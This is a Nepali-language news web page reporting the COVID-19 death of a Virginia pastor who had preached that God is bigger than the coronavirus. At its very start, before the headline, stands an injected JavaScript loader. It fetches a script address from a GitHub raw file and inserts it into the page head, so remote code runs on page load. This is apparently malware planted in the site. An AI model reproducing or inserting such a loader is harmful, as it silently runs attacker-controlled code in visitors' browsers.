;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोना भाइरसभन्दा यशु ठुलो भन्ने पास्टर कै कोरोनाबाट मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोना भाइरसभन्दा यशु ठुलो भन्ने पास्टर कै कोरोनाबाट मृत्यु
अन्तर्राष्ट्रिय

कोरोना भाइरसभन्दा यशु ठुलो भन्ने पास्टर कै कोरोनाबाट मृत्यु

एजेन्सी । अमेरिकाको भर्जिनियास्थित न्यु डेलिभिरेन्स इभान्जेलिस्टक चर्चका पास्टर विशप जेरल्ड ग्लेनको को’रोना भाइरसका कारण आइतबार नि’धन भएको छ । ग्लेनकी नातिनी मार्गेरी क्रलीले एक भिडियो स’न्देश जा’री गर्दै आफ्ना हजुरबुबालाई को’रोना भएको पुष्टि गरेकी छिन् ।यसअघि २२ मार्चमा भजिर्नियाका गर्भनर राल्फ नर्थामले १० जनाभन्दा बढी व्यक्ति भेला हुन नपाउनेगरी आ’देश जा’री गर्नुअघि उनले च’र्चमा आफ्ना भक्तजनलाई प्र’वचन दिएका थिए । ‘यो ड’रलाग्दो भाइरसभन्दा भगवान् (य’शु) ठुला छन् भन्ने मेरो गहिरो विश्वास छ,’ उनले भनेका थिए ।

उनले आफुलाई म’र्ने ड’र नभएको पनि बताएका थिए । ४ अप्रिलमा ग्लेनकी छोरीले भिडियो पोस्ट गर्दै आफ्ना बाबु र आमा मार्सिया ग्लेन दुबैमा को’रोना संक्रमण देखिएको बताएकी थिइन् । च’र्चले उनको नि’धनमा गहिरो शो’क प्रकट गरेको छ । शो’काकूल परिवारमा को’रोना संक्रमणबाट बच्नुपर्ने चु’नौती समेत रहेकाले उनीहरुलाई आफ्नै ढंगले शो’क मनाउन दिइने चर्चको वि’ज्ञप्तीमा उल्लेख छ । चर्चले संक्रमितहरुको छिटो शि’घ्र स्वास्थ लाभको कामना पनि गरेको छ ।

फेसबुक प्रतिक्रियाहरु